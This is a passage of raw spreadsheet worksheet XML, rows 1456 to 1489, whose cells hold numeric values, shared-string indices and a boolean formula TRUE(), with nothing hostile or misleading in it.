      <c r="U1455" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1456" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1456" s="1">
        <v>17824</v>
      </c>
      <c r="B1456" t="s">
        <v>0</v>
      </c>
      <c r="C1456" t="s">
        <v>78</v>
      </c>
      <c r="D1456" t="s">
        <v>1535</v>
      </c>
      <c r="E1456" t="s">
        <v>1227</v>
      </c>
      <c r="F1456">
        <v>29117302</v>
      </c>
      <c r="G1456" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1456" t="s">
        <v>1791</v>
      </c>
      <c r="K1456">
        <v>0</v>
      </c>
      <c r="L1456" t="s">
        <v>98</v>
      </c>
      <c r="R1456" t="s">
        <v>5</v>
      </c>
      <c r="S1456" t="s">
        <v>1229</v>
      </c>
      <c r="T1456" t="s">
        <v>7</v>
      </c>
      <c r="U1456" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1457" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1457" s="1">
        <v>17825</v>
      </c>
      <c r="B1457" t="s">
        <v>0</v>
      </c>
      <c r="C1457" t="s">
        <v>78</v>
      </c>
      <c r="D1457" t="s">
        <v>1535</v>
      </c>
      <c r="E1457" t="s">
        <v>1227</v>
      </c>
      <c r="F1457">
        <v>29117302</v>
      </c>
      <c r="G1457" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1457" t="s">
        <v>1792</v>
      </c>
      <c r="K1457">
        <v>0</v>
      </c>
      <c r="L1457" t="s">
        <v>98</v>
      </c>
      <c r="R1457" t="s">
        <v>5</v>
      </c>
      <c r="S1457" t="s">
        <v>1229</v>
      </c>
      <c r="T1457" t="s">
        <v>7</v>
      </c>
      <c r="U1457" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1458" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1458" s="1">
        <v>17826</v>
      </c>
      <c r="B1458" t="s">
        <v>0</v>
      </c>
      <c r="C1458" t="s">
        <v>78</v>
      </c>
      <c r="D1458" t="s">
        <v>1535</v>
      </c>
      <c r="E1458" t="s">
        <v>1227</v>
      </c>
      <c r="F1458">
        <v>29117302</v>
      </c>
      <c r="G1458" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1458" t="s">
        <v>1793</v>
      </c>
      <c r="K1458">
        <v>0</v>
      </c>
      <c r="L1458" t="s">
        <v>98</v>
      </c>
      <c r="R1458" t="s">
        <v>5</v>
      </c>
      <c r="S1458" t="s">
        <v>1229</v>
      </c>
      <c r="T1458" t="s">
        <v>7</v>
      </c>
      <c r="U1458" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1459" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1459" s="1">
        <v>17827</v>
      </c>
      <c r="B1459" t="s">
        <v>0</v>
      </c>
      <c r="C1459" t="s">
        <v>78</v>
      </c>
      <c r="D1459" t="s">
        <v>1535</v>
      </c>
      <c r="E1459" t="s">
        <v>1227</v>
      </c>
      <c r="F1459">
        <v>29117302</v>
      </c>
      <c r="G1459" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1459" t="s">
        <v>1794</v>
      </c>
      <c r="K1459">
        <v>0</v>
      </c>
      <c r="L1459" t="s">
        <v>98</v>
      </c>
      <c r="R1459" t="s">
        <v>5</v>
      </c>
      <c r="S1459" t="s">
        <v>1229</v>
      </c>
      <c r="T1459" t="s">
        <v>7</v>
      </c>
      <c r="U1459" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1460" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1460" s="1">
        <v>17828</v>
      </c>
      <c r="B1460" t="s">
        <v>0</v>
      </c>
      <c r="C1460" t="s">
        <v>78</v>
      </c>
      <c r="D1460" t="s">
        <v>1535</v>
      </c>
      <c r="E1460" t="s">
        <v>1227</v>
      </c>
      <c r="F1460">
        <v>29117302</v>
      </c>
      <c r="G1460" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1460" t="s">
        <v>1795</v>
      </c>
      <c r="K1460">
        <v>0</v>
      </c>
      <c r="L1460" t="s">
        <v>98</v>
      </c>
      <c r="R1460" t="s">
        <v>5</v>
      </c>
      <c r="S1460" t="s">
        <v>1229</v>
      </c>
      <c r="T1460" t="s">
        <v>7</v>
      </c>
      <c r="U1460" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1461" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1461" s="1">
        <v>17829</v>
      </c>
      <c r="B1461" t="s">
        <v>0</v>
      </c>
      <c r="C1461" t="s">
        <v>78</v>
      </c>
      <c r="D1461" t="s">
        <v>1535</v>
      </c>
      <c r="E1461" t="s">
        <v>1227</v>
      </c>
      <c r="F1461">
        <v>29117302</v>
      </c>
      <c r="G1461" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1461" t="s">
        <v>1796</v>
      </c>
      <c r="K1461">
        <v>0</v>
      </c>
      <c r="L1461" t="s">
        <v>98</v>
      </c>
      <c r="R1461" t="s">
        <v>5</v>
      </c>
      <c r="S1461" t="s">
        <v>1229</v>
      </c>
      <c r="T1461" t="s">
        <v>7</v>
      </c>
      <c r="U1461" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1462" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1462" s="1">
        <v>17830</v>
      </c>
      <c r="B1462" t="s">
        <v>0</v>
      </c>
      <c r="C1462" t="s">
        <v>78</v>
      </c>
      <c r="D1462" t="s">
        <v>1535</v>
      </c>
      <c r="E1462" t="s">
        <v>1227</v>
      </c>
      <c r="F1462">
        <v>29117302</v>
      </c>
      <c r="G1462" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1462" t="s">
        <v>1797</v>
      </c>
      <c r="K1462">
        <v>0</v>
      </c>
      <c r="L1462" t="s">
        <v>98</v>
      </c>
      <c r="R1462" t="s">
        <v>5</v>
      </c>
      <c r="S1462" t="s">
        <v>1229</v>
      </c>
      <c r="T1462" t="s">
        <v>7</v>
      </c>
      <c r="U1462" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1463" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1463" s="1">
        <v>17831</v>
      </c>
      <c r="B1463" t="s">
        <v>0</v>
      </c>
      <c r="C1463" t="s">
        <v>78</v>
      </c>
      <c r="D1463" t="s">
        <v>1535</v>
      </c>
      <c r="E1463" t="s">
        <v>1227</v>
      </c>
      <c r="F1463">
        <v>29117302</v>
      </c>
      <c r="G1463" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1463" t="s">
        <v>1798</v>
      </c>
      <c r="K1463">
        <v>0</v>
      </c>
      <c r="L1463" t="s">
        <v>98</v>
      </c>
      <c r="R1463" t="s">
        <v>5</v>
      </c>
      <c r="S1463" t="s">
        <v>1229</v>
      </c>
      <c r="T1463" t="s">
        <v>7</v>
      </c>
      <c r="U1463" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1464" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1464" s="1">
        <v>17832</v>
      </c>
      <c r="B1464" t="s">
        <v>0</v>
      </c>
      <c r="C1464" t="s">
        <v>78</v>
      </c>
      <c r="D1464" t="s">
        <v>1535</v>
      </c>
      <c r="E1464" t="s">
        <v>1227</v>
      </c>
      <c r="F1464">
        <v>29117302</v>
      </c>
      <c r="G1464" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1464" t="s">
        <v>1799</v>
      </c>
      <c r="K1464">
        <v>0</v>
      </c>
      <c r="L1464" t="s">
        <v>98</v>
      </c>
      <c r="R1464" t="s">
        <v>5</v>
      </c>
      <c r="S1464" t="s">
        <v>1229</v>
      </c>
      <c r="T1464" t="s">
        <v>7</v>
      </c>
      <c r="U1464" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1465" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1465" s="1">
        <v>17833</v>
      </c>
      <c r="B1465" t="s">
        <v>0</v>
      </c>
      <c r="C1465" t="s">
        <v>78</v>
      </c>
      <c r="D1465" t="s">
        <v>1535</v>
      </c>
      <c r="E1465" t="s">
        <v>1227</v>
      </c>
      <c r="F1465">
        <v>29117302</v>
      </c>
      <c r="G1465" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1465" t="s">
        <v>1800</v>
      </c>
      <c r="K1465">
        <v>0</v>
      </c>
      <c r="L1465" t="s">
        <v>98</v>
      </c>
      <c r="R1465" t="s">
        <v>5</v>
      </c>
      <c r="S1465" t="s">
        <v>1229</v>
      </c>
      <c r="T1465" t="s">
        <v>7</v>
      </c>
      <c r="U1465" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1466" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1466" s="1">
        <v>17834</v>
      </c>
      <c r="B1466" t="s">
        <v>0</v>
      </c>
      <c r="C1466" t="s">
        <v>78</v>
      </c>
      <c r="D1466" t="s">
        <v>1535</v>
      </c>
      <c r="E1466" t="s">
        <v>1227</v>
      </c>
      <c r="F1466">
        <v>29117302</v>
      </c>
      <c r="G1466" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1466" t="s">
        <v>1801</v>
      </c>
      <c r="K1466">
        <v>0</v>
      </c>
      <c r="L1466" t="s">
        <v>98</v>
      </c>
      <c r="R1466" t="s">
        <v>5</v>
      </c>
      <c r="S1466" t="s">
        <v>1229</v>
      </c>
      <c r="T1466" t="s">
        <v>7</v>
      </c>
      <c r="U1466" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1467" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1467" s="1">
        <v>17835</v>
      </c>
      <c r="B1467" t="s">
        <v>0</v>
      </c>
      <c r="C1467" t="s">
        <v>78</v>
      </c>
      <c r="D1467" t="s">
        <v>1535</v>
      </c>
      <c r="E1467" t="s">
        <v>1227</v>
      </c>
      <c r="F1467">
        <v>29117302</v>
      </c>
      <c r="G1467" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1467" t="s">
        <v>1802</v>
      </c>
      <c r="K1467">
        <v>0</v>
      </c>
      <c r="L1467" t="s">
        <v>98</v>
      </c>
      <c r="R1467" t="s">
        <v>5</v>
      </c>
      <c r="S1467" t="s">
        <v>1229</v>
      </c>
      <c r="T1467" t="s">
        <v>7</v>
      </c>
      <c r="U1467" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1468" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1468" s="1">
        <v>17836</v>
      </c>
      <c r="B1468" t="s">
        <v>0</v>
      </c>
      <c r="C1468" t="s">
        <v>78</v>
      </c>
      <c r="D1468" t="s">
        <v>1535</v>
      </c>
      <c r="E1468" t="s">
        <v>1227</v>
      </c>
      <c r="F1468">
        <v>29117302</v>
      </c>
      <c r="G1468" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1468" t="s">
        <v>1803</v>
      </c>
      <c r="K1468">
        <v>0</v>
      </c>
      <c r="L1468" t="s">
        <v>98</v>
      </c>
      <c r="R1468" t="s">
        <v>5</v>
      </c>
      <c r="S1468" t="s">
        <v>1229</v>
      </c>
      <c r="T1468" t="s">
        <v>7</v>
      </c>
      <c r="U1468" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1469" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1469" s="1">
        <v>17837</v>
      </c>
      <c r="B1469" t="s">
        <v>0</v>
      </c>
      <c r="C1469" t="s">
        <v>78</v>
      </c>
      <c r="D1469" t="s">
        <v>1535</v>
      </c>
      <c r="E1469" t="s">
        <v>1227</v>
      </c>
      <c r="F1469">
        <v>29117302</v>
      </c>
      <c r="G1469" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1469" t="s">
        <v>1804</v>
      </c>
      <c r="K1469">
        <v>0</v>
      </c>
      <c r="L1469" t="s">
        <v>98</v>
      </c>
      <c r="R1469" t="s">
        <v>5</v>
      </c>
      <c r="S1469" t="s">
        <v>1229</v>
      </c>
      <c r="T1469" t="s">
        <v>7</v>
      </c>
      <c r="U1469" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1470" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1470" s="1">
        <v>17838</v>
      </c>
      <c r="B1470" t="s">
        <v>0</v>
      </c>
      <c r="C1470" t="s">
        <v>1</v>
      </c>
      <c r="D1470" t="s">
        <v>1535</v>
      </c>
      <c r="E1470" t="s">
        <v>1227</v>
      </c>
      <c r="F1470">
        <v>29117302</v>
      </c>
      <c r="G1470" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1470" t="s">
        <v>1805</v>
      </c>
      <c r="K1470">
        <v>0</v>
      </c>
      <c r="L1470" t="s">
        <v>98</v>
      </c>
      <c r="R1470" t="s">
        <v>5</v>
      </c>
      <c r="S1470" t="s">
        <v>1229</v>
      </c>
      <c r="T1470" t="s">
        <v>7</v>
      </c>
      <c r="U1470" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1471" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1471" s="1">
        <v>17839</v>
      </c>
      <c r="B1471" t="s">
        <v>0</v>
      </c>
      <c r="C1471" t="s">
        <v>78</v>
      </c>
      <c r="D1471" t="s">
        <v>1535</v>
      </c>
      <c r="E1471" t="s">
        <v>1227</v>
      </c>
      <c r="F1471">
        <v>29117302</v>
      </c>
      <c r="G1471" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1471" t="s">
        <v>1806</v>
      </c>
      <c r="K1471">
        <v>0</v>
      </c>
      <c r="L1471" t="s">
        <v>98</v>
      </c>
      <c r="R1471" t="s">
        <v>5</v>
      </c>
      <c r="S1471" t="s">
        <v>1229</v>
      </c>
      <c r="T1471" t="s">
        <v>7</v>
      </c>
      <c r="U1471" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1472" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1472" s="1">
        <v>17840</v>
      </c>
      <c r="B1472" t="s">
        <v>0</v>
      </c>
      <c r="C1472" t="s">
        <v>1</v>
      </c>
      <c r="D1472" t="s">
        <v>1535</v>
      </c>
      <c r="E1472" t="s">
        <v>1227</v>
      </c>
      <c r="F1472">
        <v>29117302</v>
      </c>
      <c r="G1472" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1472" t="s">
        <v>1807</v>
      </c>
      <c r="K1472">
        <v>0</v>
      </c>
      <c r="L1472" t="s">
        <v>98</v>
      </c>
      <c r="R1472" t="s">
        <v>5</v>
      </c>
      <c r="S1472" t="s">
        <v>1229</v>
      </c>
      <c r="T1472" t="s">
        <v>7</v>
      </c>
      <c r="U1472" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1473" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1473" s="1">
        <v>17841</v>
      </c>
      <c r="B1473" t="s">
        <v>0</v>
      </c>
      <c r="C1473" t="s">
        <v>78</v>
      </c>
      <c r="D1473" t="s">
        <v>1535</v>
      </c>
      <c r="E1473" t="s">
        <v>1227</v>
      </c>
      <c r="F1473">
        <v>29117302</v>
      </c>
      <c r="G1473" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1473" t="s">
        <v>1808</v>
      </c>
      <c r="K1473">
        <v>0</v>
      </c>
      <c r="L1473" t="s">
        <v>98</v>
      </c>
      <c r="R1473" t="s">
        <v>5</v>
      </c>
      <c r="S1473" t="s">
        <v>1229</v>
      </c>
      <c r="T1473" t="s">
        <v>7</v>
      </c>
      <c r="U1473" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1474" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1474" s="1">
        <v>17842</v>
      </c>
      <c r="B1474" t="s">
        <v>0</v>
      </c>
      <c r="C1474" t="s">
        <v>78</v>
      </c>
      <c r="D1474" t="s">
        <v>1535</v>
      </c>
      <c r="E1474" t="s">
        <v>1227</v>
      </c>
      <c r="F1474">
        <v>29117302</v>
      </c>
      <c r="G1474" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1474" t="s">
        <v>1809</v>
      </c>
      <c r="K1474">
        <v>0</v>
      </c>
      <c r="L1474" t="s">
        <v>98</v>
      </c>
      <c r="R1474" t="s">
        <v>5</v>
      </c>
      <c r="S1474" t="s">
        <v>1229</v>
      </c>
      <c r="T1474" t="s">
        <v>7</v>
      </c>
      <c r="U1474" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1475" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1475" s="1">
        <v>17843</v>
      </c>
      <c r="B1475" t="s">
        <v>0</v>
      </c>
      <c r="C1475" t="s">
        <v>78</v>
      </c>
      <c r="D1475" t="s">
        <v>1535</v>
      </c>
      <c r="E1475" t="s">
        <v>1227</v>
      </c>
      <c r="F1475">
        <v>29117302</v>
      </c>
      <c r="G1475" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1475" t="s">
        <v>1810</v>
      </c>
      <c r="K1475">
        <v>0</v>
      </c>
      <c r="L1475" t="s">
        <v>98</v>
      </c>
      <c r="R1475" t="s">
        <v>5</v>
      </c>
      <c r="S1475" t="s">
        <v>1229</v>
      </c>
      <c r="T1475" t="s">
        <v>7</v>
      </c>
      <c r="U1475" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1476" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1476" s="1">
        <v>17844</v>
      </c>
      <c r="B1476" t="s">
        <v>0</v>
      </c>
      <c r="C1476" t="s">
        <v>78</v>
      </c>
      <c r="D1476" t="s">
        <v>1535</v>
      </c>
      <c r="E1476" t="s">
        <v>1227</v>
      </c>
      <c r="F1476">
        <v>29117302</v>
      </c>
      <c r="G1476" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1476" t="s">
        <v>1811</v>
      </c>
      <c r="K1476">
        <v>0</v>
      </c>
      <c r="L1476" t="s">
        <v>98</v>
      </c>
      <c r="R1476" t="s">
        <v>5</v>
      </c>
      <c r="S1476" t="s">
        <v>1229</v>
      </c>
      <c r="T1476" t="s">
        <v>7</v>
      </c>
      <c r="U1476" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1477" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1477" s="1">
        <v>17845</v>
      </c>
      <c r="B1477" t="s">
        <v>0</v>
      </c>
      <c r="C1477" t="s">
        <v>78</v>
      </c>
      <c r="D1477" t="s">
        <v>1535</v>
      </c>
      <c r="E1477" t="s">
        <v>1227</v>
      </c>
      <c r="F1477">
        <v>29117302</v>
      </c>
      <c r="G1477" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1477" t="s">
        <v>1812</v>
      </c>
      <c r="K1477">
        <v>0</v>
      </c>
      <c r="L1477" t="s">
        <v>98</v>
      </c>
      <c r="R1477" t="s">
        <v>5</v>
      </c>
      <c r="S1477" t="s">
        <v>1229</v>
      </c>
      <c r="T1477" t="s">
        <v>7</v>
      </c>
      <c r="U1477" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1478" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1478" s="1">
        <v>17846</v>
      </c>
      <c r="B1478" t="s">
        <v>0</v>
      </c>
      <c r="C1478" t="s">
        <v>78</v>
      </c>
      <c r="D1478" t="s">
        <v>1535</v>
      </c>
      <c r="E1478" t="s">
        <v>1227</v>
      </c>
      <c r="F1478">
        <v>29117302</v>
      </c>
      <c r="G1478" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1478" t="s">
        <v>1813</v>
      </c>
      <c r="K1478">
        <v>0</v>
      </c>
      <c r="L1478" t="s">
        <v>98</v>
      </c>
      <c r="R1478" t="s">
        <v>5</v>
      </c>
      <c r="S1478" t="s">
        <v>1229</v>
      </c>
      <c r="T1478" t="s">
        <v>7</v>
      </c>
      <c r="U1478" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1479" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1479" s="1">
        <v>17847</v>
      </c>
      <c r="B1479" t="s">
        <v>0</v>
      </c>
      <c r="C1479" t="s">
        <v>78</v>
      </c>
      <c r="D1479" t="s">
        <v>1535</v>
      </c>
      <c r="E1479" t="s">
        <v>1227</v>
      </c>
      <c r="F1479">
        <v>29117302</v>
      </c>
      <c r="G1479" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1479" t="s">
        <v>1814</v>
      </c>
      <c r="K1479">
        <v>0</v>
      </c>
      <c r="L1479" t="s">
        <v>98</v>
      </c>
      <c r="R1479" t="s">
        <v>5</v>
      </c>
      <c r="S1479" t="s">
        <v>1229</v>
      </c>
      <c r="T1479" t="s">
        <v>7</v>
      </c>
      <c r="U1479" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1480" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1480" s="1">
        <v>17848</v>
      </c>
      <c r="B1480" t="s">
        <v>0</v>
      </c>
      <c r="C1480" t="s">
        <v>78</v>
      </c>
      <c r="D1480" t="s">
        <v>1535</v>
      </c>
      <c r="E1480" t="s">
        <v>1227</v>
      </c>
      <c r="F1480">
        <v>29117302</v>
      </c>
      <c r="G1480" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1480" t="s">
        <v>1815</v>
      </c>
      <c r="K1480">
        <v>0</v>
      </c>
      <c r="L1480" t="s">
        <v>98</v>
      </c>
      <c r="R1480" t="s">
        <v>5</v>
      </c>
      <c r="S1480" t="s">
        <v>1229</v>
      </c>
      <c r="T1480" t="s">
        <v>7</v>
      </c>
      <c r="U1480" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1481" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1481" s="1">
        <v>17849</v>
      </c>
      <c r="B1481" t="s">
        <v>0</v>
      </c>
      <c r="C1481" t="s">
        <v>78</v>
      </c>
      <c r="D1481" t="s">
        <v>1535</v>
      </c>
      <c r="E1481" t="s">
        <v>1227</v>
      </c>
      <c r="F1481">
        <v>29117302</v>
      </c>
      <c r="G1481" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1481" t="s">
        <v>1816</v>
      </c>
      <c r="K1481">
        <v>0</v>
      </c>
      <c r="L1481" t="s">
        <v>98</v>
      </c>
      <c r="R1481" t="s">
        <v>5</v>
      </c>
      <c r="S1481" t="s">
        <v>1229</v>
      </c>
      <c r="T1481" t="s">
        <v>7</v>
      </c>
      <c r="U1481" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1482" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1482" s="1">
        <v>17850</v>
      </c>
      <c r="B1482" t="s">
        <v>0</v>
      </c>
      <c r="C1482" t="s">
        <v>78</v>
      </c>
      <c r="D1482" t="s">
        <v>1535</v>
      </c>
      <c r="E1482" t="s">
        <v>1227</v>
      </c>
      <c r="F1482">
        <v>29117302</v>
      </c>
      <c r="G1482" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1482" t="s">
        <v>1817</v>
      </c>
      <c r="K1482">
        <v>0</v>
      </c>
      <c r="L1482" t="s">
        <v>98</v>
      </c>
      <c r="R1482" t="s">
        <v>5</v>
      </c>
      <c r="S1482" t="s">
        <v>1229</v>
      </c>
      <c r="T1482" t="s">
        <v>7</v>
      </c>
      <c r="U1482" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1483" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1483" s="1">
        <v>17851</v>
      </c>
      <c r="B1483" t="s">
        <v>0</v>
      </c>
      <c r="C1483" t="s">
        <v>78</v>
      </c>
      <c r="D1483" t="s">
        <v>1535</v>
      </c>
      <c r="E1483" t="s">
        <v>1227</v>
      </c>
      <c r="F1483">
        <v>29117302</v>
      </c>
      <c r="G1483" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1483" t="s">
        <v>1818</v>
      </c>
      <c r="K1483">
        <v>0</v>
      </c>
      <c r="L1483" t="s">
        <v>98</v>
      </c>
      <c r="R1483" t="s">
        <v>5</v>
      </c>
      <c r="S1483" t="s">
        <v>1229</v>
      </c>
      <c r="T1483" t="s">
        <v>7</v>
      </c>
      <c r="U1483" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1484" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1484" s="1">
        <v>17852</v>
      </c>
      <c r="B1484" t="s">
        <v>0</v>
      </c>
      <c r="C1484" t="s">
        <v>78</v>
      </c>
      <c r="D1484" t="s">
        <v>1535</v>
      </c>
      <c r="E1484" t="s">
        <v>1227</v>
      </c>
      <c r="F1484">
        <v>29117302</v>
      </c>
      <c r="G1484" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1484" t="s">
        <v>1819</v>
      </c>
      <c r="K1484">
        <v>0</v>
      </c>
      <c r="L1484" t="s">
        <v>98</v>
      </c>
      <c r="R1484" t="s">
        <v>5</v>
      </c>
      <c r="S1484" t="s">
        <v>1229</v>
      </c>
      <c r="T1484" t="s">
        <v>7</v>
      </c>
      <c r="U1484" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1485" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1485" s="1">
        <v>17853</v>
      </c>
      <c r="B1485" t="s">
        <v>0</v>
      </c>
      <c r="C1485" t="s">
        <v>78</v>
      </c>
      <c r="D1485" t="s">
        <v>1535</v>
      </c>
      <c r="E1485" t="s">
        <v>1227</v>
      </c>
      <c r="F1485">
        <v>29117302</v>
      </c>
      <c r="G1485" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1485" t="s">
        <v>1820</v>
      </c>
      <c r="K1485">
        <v>0</v>
      </c>
      <c r="L1485" t="s">
        <v>98</v>
      </c>
      <c r="R1485" t="s">
        <v>5</v>
      </c>
      <c r="S1485" t="s">
        <v>1229</v>
      </c>
      <c r="T1485" t="s">
        <v>7</v>
      </c>
      <c r="U1485" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1486" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1486" s="1">
        <v>17854</v>
      </c>
      <c r="B1486" t="s">
        <v>0</v>
      </c>
      <c r="C1486" t="s">
        <v>78</v>
      </c>
      <c r="D1486" t="s">
        <v>1535</v>
      </c>
      <c r="E1486" t="s">
        <v>1227</v>
      </c>
      <c r="F1486">
        <v>29117302</v>
      </c>
      <c r="G1486" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1486" t="s">
        <v>1821</v>
      </c>
      <c r="K1486">
        <v>0</v>
      </c>
      <c r="L1486" t="s">
        <v>98</v>
      </c>
      <c r="R1486" t="s">
        <v>5</v>
      </c>
      <c r="S1486" t="s">
        <v>1229</v>
      </c>
      <c r="T1486" t="s">
        <v>7</v>
      </c>
      <c r="U1486" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1487" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1487" s="1">
        <v>17855</v>
      </c>
      <c r="B1487" t="s">
        <v>0</v>
      </c>
      <c r="C1487" t="s">
        <v>78</v>
      </c>
      <c r="D1487" t="s">
        <v>1535</v>
      </c>
      <c r="E1487" t="s">
        <v>1227</v>
      </c>
      <c r="F1487">
        <v>29117302</v>
      </c>
      <c r="G1487" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1487" t="s">
        <v>1822</v>
      </c>
      <c r="K1487">
        <v>0</v>
      </c>
      <c r="L1487" t="s">
        <v>98</v>
      </c>
      <c r="R1487" t="s">
        <v>5</v>
      </c>
      <c r="S1487" t="s">
        <v>1229</v>
      </c>
      <c r="T1487" t="s">
        <v>7</v>
      </c>
      <c r="U1487" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1488" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1488" s="1">
        <v>17856</v>
      </c>
      <c r="B1488" t="s">
        <v>0</v>
      </c>
      <c r="C1488" t="s">
        <v>78</v>
      </c>
      <c r="D1488" t="s">
        <v>1535</v>
      </c>
      <c r="E1488" t="s">
        <v>1227</v>
      </c>
      <c r="F1488">
        <v>29117302</v>
      </c>
      <c r="G1488" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1488" t="s">
        <v>1823</v>
      </c>
      <c r="K1488">
        <v>0</v>
      </c>
      <c r="L1488" t="s">
        <v>98</v>
      </c>
      <c r="R1488" t="s">
        <v>5</v>
      </c>
      <c r="S1488" t="s">
        <v>1229</v>
      </c>
      <c r="T1488" t="s">
        <v>7</v>
      </c>
      <c r="U1488" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1489" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1489" s="1">
        <v>17857</v>
      </c>
      <c r="B1489" t="s">
        <v>0</v>
      </c>
      <c r="C1489" t="s">
        <v>78</v>
      </c>
      <c r="D1489" t="s">
        <v>1535</v>
      </c>
      <c r="E1489" t="s">
        <v>1227</v>
      </c>
      <c r="F1489">
        <v>29117302</v>
      </c>
      <c r="G1489" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1489" t="s">
        <v>1824</v>
      </c>
      <c r="K1489">
        <v>0</v>
      </c>
      <c r="L1489" t="s">
        <v>98</v>
      </c>
      <c r="R1489" t="s">
        <v>5</v>
      </c>
      <c r="S1489" t="s">
        <v>1229</v>
      </c>
      <c r="T1489" t="s">
        <v>7</v>
      </c>
      <c r="U1489" t="s">
        <v>56</v>
      </c>
    </row>
